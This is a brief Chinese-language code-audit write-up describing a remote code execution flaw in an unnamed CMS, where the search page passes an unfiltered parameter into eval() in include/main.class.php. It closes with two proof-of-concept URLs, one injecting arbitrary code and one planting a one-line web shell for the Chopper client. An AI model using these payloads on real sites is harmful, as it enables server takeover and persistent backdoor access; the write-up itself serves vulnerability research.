分析
首先利用代码审计工具打开网站目录,尝试搜索能够执行代码的函数。首先想到的是eval,实际上该cms的代码执行漏洞正好是eval发起的。
搜索到包含该函数的信息很多,主要关注的是include/main.class.php里的如下区域:
引用该文件的页面是搜索页面
在每个 eval() 上面都加一句输出,看看传进来的参数的变化。
根据输出的结果来看,此处并没有任何过滤,因此接下来的 eval 将会执行代码。
所以Poc :
http://127.0.0.1/search.php?searchtype=5&tid=0&yuyan=代码
菜刀连接的Poc :
http://127.0.0.1/search.php?searchtype=5&tid=0&yuyan=eval($_POST['c'])